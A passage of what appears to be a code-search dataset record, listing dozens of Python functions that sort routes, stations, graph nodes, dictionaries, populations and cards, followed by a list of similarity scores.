routes between a certain input and output exist,\n # order the routes by length\n if len(routes) > 1:\n route_lengths = [len(route) for route in routes]\n sorted_indices = np.argsort(route_lengths)\n routes = [routes[i] for i in sorted_indices]\n sorted_routes[inp_lab][out_lab] = routes\n self.routes = sorted_routes", "def ResortPeers(self):\n \n self.sortedPeerList = []\n append = self.sortedPeerList.append\n for i in self.peerDatabase.keys():\n append((self.peerDatabase[i].RemainingRemoteStorage(), i))\n self.sortedPeerList.sort()\n self.sortedPeerList.reverse()", "def sort(self): # sort all entries to make room for new ones, determine best and worst\n ns = self.num_stored.value\n ys = np.asarray(self.ys[:ns])\n yi = ys.argsort()\n sortRuns = []\n for i in range(len(yi)):\n y = ys[yi[i]]\n xs = self.get_x(yi[i])\n sortRuns.append((y, xs))\n numStored = min(len(sortRuns),int(0.9*self.capacity)) # keep 90% best \n for i in range(numStored):\n self.replace(i, sortRuns[i][0], sortRuns[i][1])\n self.num_sorted.value = numStored \n self.num_stored.value = numStored \n return numStored", "def sortNgrams(hashtable):\n\tsorted = map(lambda (x, y): (y,x), hashtable.items())\n\tsorted.sort() # sort on basis of frequency\n\tsorted.reverse() # revert order: most frequent first\n\treturn map(lambda (y, x): (x, y), sorted)", "def sort_codon_table_by_frequency(codon_table: dict) -> dict:\n new_codon_table = dict()\n for letter, codon_frequencies in codon_table.items():\n 
new_codon_table[letter] = dict(sorted(codon_frequencies.items(), key=lambda x: x[1], reverse=True))\n return new_codon_table", "def sort_results(self):\n pass", "def connection_sort_key(conn):\n\n conn_rec_state = ConnRecord.State.get(conn[\"state\"])\n if conn_rec_state is ConnRecord.State.ABANDONED:\n pfx = \"2\"\n elif conn_rec_state is ConnRecord.State.INVITATION:\n pfx = \"1\"\n else:\n pfx = \"0\"\n\n return pfx + conn[\"created_at\"]", "def natsort(lst):\n lst.sort(key=natsort_key)", "def sort_values(self):\n self._elements = list(\n _[-1] for _ in sorted((e.value, e.weight, e) for e in self)\n )", "def sortedItems (dict):\n items = dict.items ()\n items.sort ()\n return items", "def get_three_largest_stations_graph(filename):\n with open(filename) as f_in:\n reader = csv.DictReader(f_in)\n station = {} # This is a {station-id: station-name} dictionary. It is more efficient by using id.\n start_station_number = {} # This is a {station-id: number of connections} dictionary.\n start_station_route = {} # This is a {start-id: {end_id: number of connections}} dictionary.\n\n largest_station_id = 0\n largest_station_times = 0\n second_largest_station_id = 0\n second_largest_station_times = 0\n third_largest_station_id = 0\n third_largest_station_times = 0\n for row in reader:\n start_id = row['start station id']\n end_id = row['end station id']\n if station.get(start_id) is None:\n station[start_id] = row['start station name']\n if station.get(end_id) is None:\n station[end_id] = row['start station name']\n if start_station_route.get(start_id) is None:\n start_station_route[start_id] = {}\n start_station_route[start_id][end_id] = 1\n start_station_number[start_id] = 1\n else:\n start_station_number[start_id] += 1\n if start_station_route[start_id].get(end_id) is None:\n start_station_route[start_id][end_id] = 1\n else:\n start_station_route[start_id][end_id] += 1\n\n times = start_station_number[start_id]\n if times > third_largest_station_times:\n if times >= second_largest_station_times:\n if times >= largest_station_times:\n # If this one is the largest one, only adding the largest by one\n if start_id != largest_station_id:\n third_largest_station_id = second_largest_station_id\n third_largest_station_times = second_largest_station_times\n second_largest_station_id = largest_station_id\n second_largest_station_times = largest_station_times\n largest_station_id = start_id\n largest_station_times += 1\n else:\n # If this one is the second largest one, only adding the second largest by one\n if start_id != second_largest_station_id:\n third_largest_station_id = second_largest_station_id\n third_largest_station_times = second_largest_station_times\n second_largest_station_id = start_id\n second_largest_station_times = times\n else:\n third_largest_station_id = start_id\n third_largest_station_times = times\n\n # print the largest three stations information\n largest_station = station[largest_station_id]\n second_largest_station = station[second_largest_station_id]\n third_largest_station = station[third_largest_station_id]\n print(\"The largest three stations in NYC are {}, {}, and {}.\"\n .format(largest_station, second_largest_station, third_largest_station))\n print(\"{} has {} connections with {} stations.\".\n format(largest_station, largest_station_times, len(start_station_route[largest_station_id])))\n print(\"{} has {} connections with {} stations.\".\n format(second_largest_station, second_largest_station_times,\n len(start_station_route[second_largest_station_id])))\n print(\"{} 
has {} connections with {} stations.\".\n format(third_largest_station, third_largest_station_times,\n len(start_station_route[third_largest_station_id])))\n\n # sort the station_route by numbers of connections and get the first ten start-end connections\n largest_station_graph = get_station_graph(largest_station_id,\n sort_end_station_list(start_station_route[largest_station_id]))\n second_largest_station_graph = get_station_graph(second_largest_station_id, sort_end_station_list(\n start_station_route[second_largest_station_id]))\n third_largest_station_graph = get_station_graph(third_largest_station_id, sort_end_station_list(\n start_station_route[third_largest_station_id]))\n\n # convert the station-id back to station-name\n largest_station_graph = get_station_name(largest_station_graph, station)\n second_largest_station_graph = get_station_name(second_largest_station_graph, station)\n third_largest_station_graph = get_station_name(third_largest_station_graph, station)\n\n return largest_station_graph, second_largest_station_graph, third_largest_station_graph", "def _sort(self):\n self.population.sort()\n self.population.reverse()", "def sorting_dict(self):\n ### take length of key and write in new dictionary repaired number without dots\n d_rekey = dict()\n l_rekey = list()\n # take max level of hash\n level = self.take_max_level()\n for k,v in self.d.items():\n l_key = k.split(\":\")\n delta = level - len(l_key)\n new_key = (\"\".join(l_key) + str(0)*delta)[1:]\n d_rekey[new_key] = k\n l_rekey.append(int(new_key))\n l_rekey.sort()\n return l_rekey, d_rekey", "def sort_by_ip(unsorted):\n by_ip = {}\n\n for k, v in unsorted.items():\n for ip in v:\n if ip in by_ip and k not in by_ip[ip]:\n by_ip[ip].append(k)\n else:\n by_ip[ip] = [k]\n\n return OrderedDict(sorted(by_ip.items()))", "def sort(self):\r\n\t\tif ScoreOpt.isGroupVassals():\r\n\t\t\tself._playerScores.sort(lambda x, y: cmp(x.sortKey(), y.sortKey()))\r\n\t\t\tself._playerScores.reverse()\r\n\t\tmaxPlayers = ScoreOpt.getMaxPlayers()\r\n\t\tif maxPlayers > 0 and len(self._playerScores) > maxPlayers:\r\n\t\t\tself._playerScores = self._playerScores[len(self._playerScores) - maxPlayers:]", "def topo_sort(self):\n # TODO: detect cycles\n self.find_reachable_nodes()\n # save list of nodes in topo order\n self.nodes = []\n # assign each node an id field incrementally\n cur_id = 0\n # count visited outgoing edges for each node\n unvisited = {}\n for nid, node in list(self.found.items()):\n unvisited[nid] = node.nout\n queue = [self.root]\n #print >>sys.stderr, '+++'\n while queue:\n # take off nodes whose all outgoing edges are visited from\n # queue head\n node = queue.pop(0)\n self.nodes.append(node)\n node.hg = self\n node.id = cur_id\n cur_id += 1\n for edge in node.incoming:\n edge.hg = self\n for tailnode in edge.tail:\n #print >>sys.stderr, tailnode\n unvisited[id(tailnode)] -= 1\n if unvisited[id(tailnode)] == 0:\n queue.append(tailnode)\n self.sanity_check()\n self.tasks_done.add('topo_sort')", "def _sort_nodes_by_height(self):\n self.node_high_to_low = np.argsort(self.height)[::-1]\n\n # Also to sort neighbour node array by height\n\n neighbour_array_lo_hi = self.neighbour_array.copy() # easiest way to get size / structure right\n\n for node in range(0,self.tri.npoints):\n heights = self.height[self.neighbour_array[node]]\n neighbour_array_lo_hi[node] = self.neighbour_array[node][np.argsort(heights)]\n \n self.neighbour_array_lo_hi = neighbour_array_lo_hi", "def sort(self):\r\n\t\treturn sorted(self.sample)", "def 
sortByValue(d):\r\n items=d.items()\r\n backitems=[ [v[1],v[0]] for v in items]\r\n backitems.sort(); backitems.reverse()\r\n return [ backitems[i][1] for i in range(0,len(backitems))]", "def sort_nodes_by_n_reachable(graph):\n list_of_node_and_reachables_tups = [] # stores the number of reachable nodes per node\n # The following for loop finds the number of reachable nodes per node\n for node_to_test in graph.nodes:\n n_reachable = 0\n # The following for loop checks each node if it is reachable from node_to_test. If so, adds to the counter\n for node_is_reachable in graph.nodes:\n if graph.is_reachable(node_to_test, node_is_reachable) and node_to_test != node_is_reachable:\n n_reachable += 1\n # Adds a tuple with the node_to_test and the counter of reachable nodes\n list_of_node_and_reachables_tups.append((node_to_test, n_reachable))\n # At this point we have a list with tuples including the node name and its reachables. Now need to sort them\n sorted_nodes_by_reachable = sorted(list_of_node_and_reachables_tups, key=lambda tup: tup[1], reverse=True)\n return sorted_nodes_by_reachable", "def sort_series(a, n):\n\t# This uses the above function to calculate the order by which the dictionary should be ordered\n\t# Any ties are then sorted by the first element in the lists\n\n\treturn sorted(a, key=lambda x: (series_score(x,n),x[1][0]))\n\n\t# Below, to test the function out the dictionary is printed with it's values, then without the values and just\n\t# as a string to make it easier to read and check.", "def sort_max_h2h_odds(self):\n\n\t\tfor i,event in enumerate(self.teams):\n\t\t\t# for each event\n\n\t\t\t# init list of 2 dictonarys (1 for each team) that contains the max odds and the site for those odds\n\t\t\tself.max_h2h_odds.append({self.teams[i][0] : [0, \"no site\"], self.teams[i][1] : [0, \"no site\"]})\n\n\t\t\tfor j,team in enumerate(self.teams[i]):\n\t\t\t\t# for each team\n\t\t\t\tfor k,site_odds in enumerate(self.h2h_odds[i]):\n\t\t\t\t\t# for all odds find largest and save\n\t\t\t\t\tif site_odds[j] > self.max_h2h_odds[i][team][0]:\n\t\t\t\t\t\tself.max_h2h_odds[i][team] = [site_odds[j] , self.betting_sites[i][k]]\n\t\t\n\t\tprint('Finished finding max odds')", "def dmc_order(self):\n return sorted(self.lookup_table, key=lambda clr: int(clr.id) if clr.id.isdigit() else 0)", "def sort_neighbors_by_site_index_i(neighbor_count_df: pd.DataFrame) -> pd.DataFrame:\n return neighbor_count_df.sort_values(by=[\"i\", \"distance_bin\", \"j\"]).reset_index(\n drop=True\n )", "def sort(self):\r\n self.candidates.sort(key=self.sortFitness)\r\n return", "def asc(self):\n self.get_output = sorted((value, key) for (key, value) in self.get_output.items())", "def init_sorted_variables(self):\n variables_by_neighbors = [] # A list of (var_name, |neighbors|)\n for variable in self.var_names:\n variables_by_neighbors.append(\n (self.variables[variable].get_name(), len(self.variables[variable].get_neighbors())))\n\n # In this part we sort the variables according to the heuristic:\n variables_by_neighbors = sorted(variables_by_neighbors, key=lambda tup: tup[1], reverse=True)\n # (J) Notice that there can be many variables with same neighbour, thus the order between them isn't determined.\n self.sorted_variables = [*map(lambda x: x[0], variables_by_neighbors)]", "def get_top_10_dict():\n top_10_raw = session.execute(\"SELECT * FROM yolo_top_10\")\n\n top_10_sorted = []\n for row in top_10_raw:\n try:\n map_url = ladder_maps[row[0]]\n except KeyError:\n map_url = 
(\"https://s3-us-west-1.amazonaws.com/guang-stargazer/\"\n \"ladder_maps/cat.jpg\")\n top_10_sorted.append((row[0], row[1], map_url))\n top_10_sorted.sort(key=lambda tup: tup[1], reverse=True)\n\n top_10_dict = {}\n for position, row in enumerate(top_10_sorted):\n top_10_dict[\"num\" + str(position)] = {\"map_name\": row[0],\n \"match_count\": row[1],\n \"map_url\": row[2]}\n return top_10_dict", "def stations(self):\n for stat in sorted(self.station_records):\n yield self.station_records[stat]", "def _sort_membind_info(membind_bind_info):\n membind_cpu_list = []\n nodes_count = int(max(element[2] for element in membind_bind_info)) + 1\n # Sort list by Node id\n for node_number in range(nodes_count):\n node_core_list = []\n core_info = {}\n for entry in membind_bind_info:\n cpu_id = int(entry[0])\n core_id = int(entry[1])\n node_id = int(entry[2])\n # On a machine where there is no NUMA nodes, entry[3] could be empty, so set socket_id = -1\n if entry[3] != \"\":\n socket_id = int(entry[3])\n else:\n socket_id = -1\n\n # Skip nodes other than current node number\n if node_number != node_id:\n continue\n\n # Add core info\n if cpu_id == core_id:\n core_info.update({\n core_id: {\n \"cpu_id\": cpu_id,\n \"node_id\": node_id,\n \"socket_id\": socket_id,\n },\n })\n else:\n # Add information about Hyper Threading\n core_info[core_id][\"ht_cpu_id\"] = cpu_id\n\n # Change dict of dicts to list of dicts\n for iterator in range(len(core_info)):\n curr_core_id = len(core_info) * node_number + iterator\n single_core_info = core_info.get(curr_core_id)\n if single_core_info:\n node_core_list.append(single_core_info)\n\n membind_cpu_list.append(node_core_list)\n\n return membind_cpu_list", "def station_analysis(data):\n unique_stations = list(set(data['start_station_name'].tolist() + data['end_station_name'].tolist()))\n\n station_counter = {station : 0 for station in unique_stations}\n for index, row in data.iterrows():\n station_counter[row['start_station_name']] += 1\n\n print('List of all stations:')\n print(unique_stations)\n\n keys = list(station_counter.keys())\n vals = list(station_counter.values())\n indexArr = np.argsort(list(station_counter.values()))\n popularStations = []\n for i in reversed(indexArr):\n popularStations.append((keys[i], vals[i]))\n\n stations1, journeys = zip(*popularStations[0:10])\n plt.bar(stations1, journeys, 0.1)\n\n plt.xticks(stations1, rotation='vertical')\n plt.title('Popular stations')\n plt.xlabel('Station names')\n plt.ylabel('Journeys')\n\n plt.show()\n return station_counter", "def sort_key(self):\n ...", "def print_sorted_table_by_value(table):\n\td_view = [ (v,k) for k,v in table.iteritems() ]\n\td_view.sort(reverse=True) # natively sort tuples by first element\n\tfor v,k in d_view:\n\t\tprint \"%d: %s\" % (v,k)", "def test_list_ipsec_site_connection_sort(self):\r\n resources = \"ipsec_site_connections\"\r\n cmd = ipsec_site_connection.ListIPsecSiteConnection(\r\n test_cli20.MyApp(sys.stdout), None\r\n )\r\n self._test_list_resources(resources, cmd,\r\n sort_key=[\"name\", \"id\"],\r\n sort_dir=[\"asc\", \"desc\"])", "def brute_force_cow_transport(cows,limit=10):\n # TODO: Your code here\n #print(list(cows.items()))\n cows_list=list(cows.items())\n curr_list=[[[0]]]\n for i in range(1,len(cows_list)):\n smaller_fun(curr_list,i,limit,cows_list)\n\n ans =sorted(curr_list,key=lambda x:len(x))\n print(ans)\n ansfinal=[]\n for item in ans:\n trip=[]\n for i in range(len(item)):\n trip.append(cows_list[item[i]][0])\n ansfinal.append(trip)\n return ansfinal", "def 
_sort_segments_by_weight(self, l_segments):\n if len(l_segments) < 2:\n return l_segments\n\n l_segments_weights = sorted(\n [(i, self._calc_weight_of_segment(t_segment[0])) for i, t_segment in enumerate(l_segments)],\n key=lambda x: x[1], reverse=True)\n\n l_segments_sorted = [l_segments[i] for i, _ in l_segments_weights]\n return l_segments_sorted", "def categorize_data(data, top_count):\n sorted_by_tcp = sorted(\n data, key=lambda x: x['TCP Utilization'], reverse=True\n )[0:top_count]\n sorted_by_udp = sorted(\n data, key=lambda x: x['UDP Utilization'], reverse=True\n )[0:top_count]\n\n print(f\"\\nTOP-{top_count} port flooders by TCP\")\n print(tabulate(sorted_by_tcp, headers='keys', tablefmt=\"psql\"))\n print(f\"\\nTOP-{top_count} port flooders by UDP\")\n print(tabulate(sorted_by_udp, headers='keys', tablefmt=\"psql\"))", "def toposorted(infos):\n key_to_info = {}\n depends = {}\n for info in infos:\n key_to_info[info.key] = info\n depends[info.key] = []\n for info in infos:\n for after in info.after:\n after_info = key_to_info[after]\n depends[info.key].append(after_info)\n for before in info.before:\n before_info = key_to_info[before]\n depends[before_info.key].append(info)\n return topological_sort(infos, lambda info: depends[info.key])", "def test_topological_sort(self) -> None:\n\n # tuple convention: (outgoing, incoming)\n graph = {\n \"1\": ([\"4\"], []),\n \"2\": ([\"4\"], []),\n \"3\": ([\"5\", \"6\"], []),\n \"4\": ([\"7\", \"5\"], [\"1\", \"2\"]),\n \"5\": ([\"8\"], [\"4\", \"3\"]),\n \"6\": ([], [\"3\"]),\n \"7\": ([\"8\"], [\"4\"]),\n \"8\": ([], [\"7\", \"5\"])\n } # type: Dict[str, Tuple[List[str], List[str]]]\n\n self.assertEqual(topological_sort(graph, [\"1\", \"2\", \"3\"]), [\"1\", \"2\", \"3\", \"4\", \"6\", \"7\", \"5\", \"8\"])", "def test_topological_sort(self) -> None:\n\n # tuple convention: (outgoing, incoming)\n graph = {\n \"1\": ([\"4\"], []),\n \"2\": ([\"4\"], []),\n \"3\": ([\"5\", \"6\"], []),\n \"4\": ([\"7\", \"5\"], [\"1\", \"2\"]),\n \"5\": ([\"8\"], [\"4\", \"3\"]),\n \"6\": ([], [\"3\"]),\n \"7\": ([\"8\"], [\"4\"]),\n \"8\": ([], [\"7\", \"5\"])\n } # type: Dict[str, Tuple[List[str], List[str]]]\n\n self.assertEqual(topological_sort(graph, [\"1\", \"2\", \"3\"]), [\"1\", \"2\", \"3\", \"4\", \"6\", \"7\", \"5\", \"8\"])", "def sort(self, value_key=None, ascending=True):\r\n\t\tsorted_indexes = MultiPointData.sort(self, value_key=value_key, ascending=ascending)\r\n\t\tself.sdr = np.array(self.sdr)[sorted_indexes]\r\n\t\treturn sorted_indexes", "def _device_sort_key(iface):\n dev = (iface.get(\"device\") or \"\").lower()\n if dev.startswith(\"eth\") or dev.startswith(\"en\"):\n return \"0\" + dev\n if dev.startswith(\"wl\"):\n return \"1\" + dev\n if dev.startswith(\"e\") or dev.startswith(\"w\"):\n return \"2\" + dev\n else:\n return dev", "def orderings(self, function_graph):\r\n return OrderedDict()", "def _sort_measurements(self):\n if self._unsorted:\n sorted_ndxs = np.argsort(self._angles)\n self._distances = self._distances[sorted_ndxs]\n self._angles = self._angles[sorted_ndxs]\n self._intensities = self._intensities[sorted_ndxs]\n self._error_codes = self._error_codes[sorted_ndxs]\n self._unsorted = False", "def keys_sorted_by_value(d):\n # By Daniel Schult, 2004/01/23\n # http://aspn.activestate.com/ASPN/Python/Cookbook/Recipe/52306\n items=d.items()\n backitems=[ [v[1],v[0]] for v in items]\n backitems.sort()\n return [ backitems[i][1] for i in range(0,len(backitems))]", "def _sort_phot(self, verbose=False):\n if hasattr(self, 
\"data\") and hasattr(self, \"data_filters\"):\n ## This looks fugly.\n newkeys = np.array([i for i in self.data_filters.keys()])[np.argsort([self.data_filters[i].lambda_effective.value for i in self.data_filters])]\n\n sorted_data = OrderedDict()\n sorted_data_filters = OrderedDict()\n\n for newkey in newkeys:\n\n if verbose: print(newkey)\n\n sorted_data[newkey] = self.data[newkey]\n sorted_data_filters[newkey] = self.data_filters[newkey]\n\n self.data = sorted_data\n self.data_filters = sorted_data_filters\n\n else:\n warnings.warn(\"Doesn't seem to be any data here (empty self.data)\")\n pass", "def sort_weight(self):\n self._elements = list(\n _[-1] for _ in sorted((e.weight, e.value, e) for e in self)\n )", "def sort_facility(self):\n self.entries.sort(key=lambda x: x.severity)\n self.entries.sort(key=lambda x: x.facility)", "def _sort_ds(self):\n d = []\n for layer in self.structure:\n if (layer.type == 'Layer' or layer.type == 'Substrate'):\n d.append(layer.thickness)\n d.insert(0, self.structure[0].thickness)\n d.append(self.structure[-1].thickness)\n d = np.asarray(d)\n return d", "def sortVersion(ver_map):\n\tfor key in list(ver_map.keys()):\n\t\tver_map[key].sort( key=lambda x: x[1], reverse=True)", "def group_packets(self, packets):\n sessions = packets.sessions() # groups connections from X to Y as a Scapy PacketList in a dict\n # example: dict['TCP 172.217.17.102:443 > 10.7.2.60:38386'] = PacketList\n\n session_keys = list(sessions.keys()) # force copy so we can alter the dictionary at runtime\n for key in session_keys:\n reversed_key = self.reverse_dict_key(key)\n if(reversed_key != key and sessions.__contains__(reversed_key)):\n sessions[key] += sessions.pop(reversed_key)\n session_keys.remove(reversed_key)\n\n return self.sort_grouped_packets(list(sessions.values()))", "def sort(self):\n # Sort here actually uses the tuple comparison we defined in the Card class\n self.cards.sort()", "def sortPopulation(self):\n self.population = sorted(self.population, key=attrgetter('fitness'), reverse=True)", "def sort(self):\n self.cards.sort()", "def sort(self):\n self.cards.sort()", "def collect(duthosts, tbinfo):\n duts_map = tbinfo['duts_map']\n res = defaultdict(dict)\n for dut in duthosts:\n dut_indx = duts_map[dut.hostname]\n dut_hostname = dut.hostname\n res[dut_hostname]['devices_interconnect_interfaces'] = get_interconnected_links(tbinfo, dut_indx)\n res[dut_hostname]['vm_links'] = get_vm_links(tbinfo, dut_indx)\n host_interfaces = tbinfo['topo']['ptf_map'][str(dut_indx)]\n res[dut_hostname]['vm_link_on_ptf'] = host_interfaces[res[dut_hostname]['vm_links'][0]]\n _ = [host_interfaces.pop(vm) for vm in res[dut_hostname]['vm_links'] if vm in list(host_interfaces.keys())]\n res[dut_hostname]['host_interfaces'] = natsorted(host_interfaces)\n res[dut_hostname]['ptf_map'] = host_interfaces\n res[dut_hostname]['all_links'] = natsorted(res[dut_hostname]['host_interfaces'] +\n res[dut_hostname]['devices_interconnect_interfaces'] +\n res[dut_hostname]['vm_links'])\n res[dut_hostname]['mclag_interfaces'] = natsorted(\n [PC_NAME_TEMPLATE.format(indx + 1)\n for indx, _ in enumerate(res[dut_hostname]['host_interfaces'][:-2])])\n return res", "def sort_ranking_dict(self):\n\n # reset self.ranking_dict to empty dict (if sorted tuple)\n self.ranking_dict = {}\n\n # create ranking dict with player and grand total score\n for j, player in enumerate(self._players_list):\n ranking_name, ranking_score = \\\n self._players_list[j].get_name_and_grand_total_score()\n self.ranking_dict[ranking_name] = 
ranking_score\n\n # reverse sort ranking dict by grand total (returns list)\n self.ranking_dict = sorted(self.ranking_dict.items(),\n key=lambda x: x[1], reverse=True)", "def sorting(self, presorted=None):\n self._sorted_nodes = []\n if presorted:\n notsorted_nodes = copy(presorted)\n else:\n notsorted_nodes = copy(self.nodes)\n predecessors = {key: copy(val) for (key, val) in self.predecessors.items()}\n\n # nodes that depends only on the self._nodes_wip should go first\n # soe remove them from the connections\n for nd_out in self._node_wip:\n for nd_in in self.successors[nd_out.name]:\n predecessors[nd_in.name].remove(nd_out)\n\n while notsorted_nodes:\n sorted_part, notsorted_nodes = self._sorting(notsorted_nodes, predecessors)\n self._sorted_nodes += sorted_part\n for nd_out in sorted_part:\n for nd_in in self.successors[nd_out.name]:\n predecessors[nd_in.name].remove(nd_out)", "def update_link_statistics(self):\n for link in self.links.values():\n link.update_link_statistics()\n if self.track:\n key = self.id + \":\" + globals.PACKETLOSS\n globals.statistics[key][globals.systime] = self.droppedpackets\n self.droppedpackets = 0", "def natsort_icase(lst):\n lst.sort(key=natsort_key_icase)", "def order_domain_values(self, var, assignment):\n # retrieve the domain for the variable\n domain = self.domains[var]\n # initialise a dictionary for sorting the values in the variable's domain\n sorting_dict = {} \n # for each of the values in the variable's domain \n for value in domain:\n # set the constraint counter to zero\n sorting_dict[value] = 0\n # for each of the neighbors of the variable\n for neighbor in self.crossword.neighbors(var):\n # retrieve the overlap indexes\n overlap = self.crossword.overlaps[(neighbor, var)]\n # for each of the overlap's possible values (the overlap's domain)\n for test in self.domains[neighbor]:\n # if the overlap letter is not the same\n if test[overlap[0]] != value[overlap[1]]:\n # this value constrains the neighbor's domain\n sorting_dict[value] += 1\n # sort the dictionary by the value of the sorting key\n sorted_vars = sorted(domain, key=lambda x: sorting_dict[x])\n return sorted_vars", "def sort_duration(self):\n self.sort('duration')", "def sort_data(data):\n sorted_data = {}\n for datum in data:\n for key in datum:\n collection = sorted_data.get(key, [])\n collection.append(int(datum[key]))\n sorted_data[key] = collection\n return sorted_data", "def get_maps(sort_index):\n conn = connect()\n cur = conn.cursor()\n cur.execute(\"SELECT * from maps\")\n maps = cur.fetchall()\n cur.close()\n conn.close()\n print \"number of maps fetched: \" + str(len(maps))\n return sorted(maps, key=lambda k: k[sort_index])" ]
[ "0.6438473", "0.6063636", "0.5954494", "0.5753256", "0.572934", "0.5722744", "0.55783653", "0.54763424", "0.5446469", "0.54192704", "0.5373764", "0.531757", "0.5296655", "0.5287621", "0.5285237", "0.5215991", "0.52076167", "0.52006", "0.5183816", "0.51670825", "0.51528376", "0.5143027", "0.5131351", "0.51195717", "0.51148933", "0.5101579", "0.51013666", "0.5089672", "0.5086954", "0.5074658", "0.5043467", "0.5041102", "0.5040515", "0.50367016", "0.5008699", "0.50045955", "0.5003179", "0.4996999", "0.49931997", "0.49930784", "0.49912342", "0.4970673", "0.4960229", "0.49588868", "0.49407667", "0.4934521", "0.49339467", "0.493055", "0.49213305", "0.49184853", "0.49155405", "0.49119186", "0.49101314", "0.4908905", "0.48954204", "0.4892789", "0.48880208", "0.48860583", "0.48843065", "0.487561", "0.4874506", "0.48725066", "0.4871554", "0.4871512", "0.48707503", "0.48693636", "0.48644957", "0.4856643", "0.4856393", "0.48444605", "0.48358583", "0.48328793", "0.48207933", "0.48202148", "0.48166797", "0.48166797", "0.4816507", "0.48129734", "0.4812118", "0.48082063", "0.48050842", "0.48029253", "0.4802547", "0.47999492", "0.47972572", "0.47858545", "0.47748122", "0.47482523", "0.47428018", "0.4722396", "0.4722396", "0.47186175", "0.47178936", "0.47082448", "0.47055352", "0.47036886", "0.46985942", "0.46964854", "0.46944624", "0.46915525" ]
0.6300883
1
Tries all possible configurations starting at the first station and only adds the configuration with the best score.
def visit_all_possibilities(self, first_station, track, grid): # loops over connections of station for connection in first_station.connections: # keeps adding untill the max length of a track is reached if track.add_station(grid, self.stations[connection].name): # calculates the quality of adding the station and remembers it if it is the best score yet if grid.get_quality() > self.best_score: self.best_score = grid.get_quality() self.grid = copy.deepcopy(grid) print(f"new best score: {self.best_score}:\n{self.grid}\n\n") # repeat untill there are no more configurations left self.visit_all_possibilities(self.stations[connection], track, grid) track.remove_last_station()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def pick_next_station(self, station):\n self.best_score = 0\n\n stations = self.grid.stations\n # all connections of the last added added station \n lookahead_1 = self.grid.get_station(self.best_connection[1]).connections\n\n for la1 in lookahead_1.values():\n next_station = la1[0].name\n # if adding the connection exceeds the tracks max time length \n if self.track.add_station(self.grid, next_station) is False:\n break\n\n lookahead_2 = self.grid.get_station(la1[0].name).connections\n\n # keeps adding stations untill the time limit is reached\n for la2 in lookahead_2:\n la2 = stations.get(la2)\n if self.track.add_station(self.grid, la2.name) is False:\n break\n \n quality = self.grid.get_quality()\n \n self.track.remove_last_station()\n\n # if quality improves, add first station to the track\n if quality > self.best_score:\n self.best_score = quality \n self.best_connection = [la2.name, la1[0].name]\n \n self.track.remove_last_station()", "def get_bests(self):\n set_names = [\"training\", \"hp_selection\", \"validation\"]\n run_tec_conf_set = recursivedict()\n validation = self._campaign_configuration['General']['validation']\n hp_selection = self._campaign_configuration['General']['hp_selection']\n if (validation, hp_selection) in {(\"All\", \"All\"), (\"Extrapolation\", \"All\"), (\"All\", \"HoldOut\"), (\"HoldOut\", \"All\"), (\"HoldOut\", \"HoldOut\"), (\"Extrapolation\", \"HoldOut\")}:\n # For each run, for each technique the best configuration\n run_tec_best_conf = recursivedict()\n\n # Hyperparameter search\n for conf in self._exp_confs:\n run = int(conf.get_signature()[0].replace(\"run_\", \"\"))\n technique = conf.technique\n run_tec_conf_set[run][technique][str(conf.get_signature()[4:])] = conf.mapes\n # First experiment for this technique or better than the current best\n if technique not in run_tec_best_conf[run] or conf.mapes[\"hp_selection\"] < run_tec_best_conf[run][technique].mapes[\"hp_selection\"]:\n run_tec_best_conf[run][technique] = conf\n\n # Print results for each run\n for run in range(0, self._campaign_configuration['General']['run_num']):\n self._logger.info(\"-->Printing results for run %s\", str(run))\n overall_run_best = None\n # Print data of single techniques\n for technique in run_tec_best_conf[run]:\n temp = run_tec_best_conf[run][technique]\n self._logger.info(\"---Best result for %s - Configuration is %s - (Training MAPE is %f - HP Selection MAPE is %f) - Validation MAPE is %f\", technique, temp.get_signature()[4:], temp.mapes[\"training\"], temp.mapes[\"hp_selection\"], temp.mapes[\"validation\"])\n\n # Compute which is the best technique\n if not overall_run_best or temp.mapes[\"hp_selection\"] < overall_run_best.mapes[\"hp_selection\"]:\n overall_run_best = temp\n best_model_description = overall_run_best.print_model()\n self._logger.info(\"<--Overall best result is %s %s - (Training MAPE is %f - HP Selection MAPE is %f) - Validation MAPE is %f\", overall_run_best.get_signature()[3:], \"(\" + best_model_description + \")\" if best_model_description else \"\", overall_run_best.mapes[\"training\"], overall_run_best.mapes[\"hp_selection\"], overall_run_best.mapes[\"validation\"])\n\n elif (validation, hp_selection) in {(\"KFold\", \"All\"), (\"KFold\", \"HoldOut\")}:\n folds = float(self._campaign_configuration['General']['folds'])\n # For each run, for each fold, for each technique, the best configuration\n run_fold_tec_best_conf = recursivedict()\n\n # Hyperparameter search inside each fold\n for conf in self._exp_confs:\n run = 
int(conf.get_signature()[0].replace(\"run_\", \"\"))\n fold = int(conf.get_signature()[1].replace(\"f\", \"\"))\n technique = conf.technique\n if \"hp_selection\" not in run_tec_conf_set[run][technique][str(conf.get_signature_string()[4:])]:\n for set_name in set_names:\n run_tec_conf_set[run][technique][str(conf.get_signature_string()[4:])][set_name] = 0\n for set_name in set_names:\n run_tec_conf_set[run][technique][str(conf.get_signature_string()[4:])][set_name] = run_tec_conf_set[run][technique][str(conf.get_signature_string()[4:])][set_name] + conf.mapes[set_name] / folds\n # First experiment for this fold+technique or better than the current best\n if technique not in run_fold_tec_best_conf[run][fold] or conf.mapes[\"hp_selection\"] < run_fold_tec_best_conf[run][fold][technique].mapes[\"hp_selection\"]:\n run_fold_tec_best_conf[run][fold][technique] = conf\n\n # Aggregate different folds (only the value of the mapes)\n run_tec_set = recursivedict()\n for run in run_fold_tec_best_conf:\n for fold in run_fold_tec_best_conf[run]:\n for tec in run_fold_tec_best_conf[run][fold]:\n if \"hp_selection\" not in run_tec_set[run][technique]:\n for set_name in set_names:\n run_tec_set[run][tec][set_name] = 0\n for set_name in set_names:\n run_tec_set[run][tec][set_name] = run_fold_tec_best_conf[run][fold][tec].mapes[set_name]\n # Print results for each run\n for run in range(0, self._campaign_configuration['General']['run_num']):\n self._logger.info(\"Printing results for run %s\", str(run))\n overall_run_best = ()\n # Print data of single techniques\n for technique in run_tec_set[run]:\n self._logger.info(\"---Best result for %s - (Training MAPE is %f - HP Selection MAPE is %f) - Validation MAPE is %f\", technique, run_tec_set[run][technique][\"training\"], run_tec_set[run][technique][\"hp_selection\"], run_tec_set[run][technique][\"validation\"])\n\n # Compute which is the best technique\n if not overall_run_best or run_tec_set[run][technique][\"hp_selection\"] < overall_run_best[1][\"hp_selection\"]:\n overall_run_best = (technique, run_tec_set[run][technique])\n\n self._logger.info(\"---Overall best result is %s - (Training 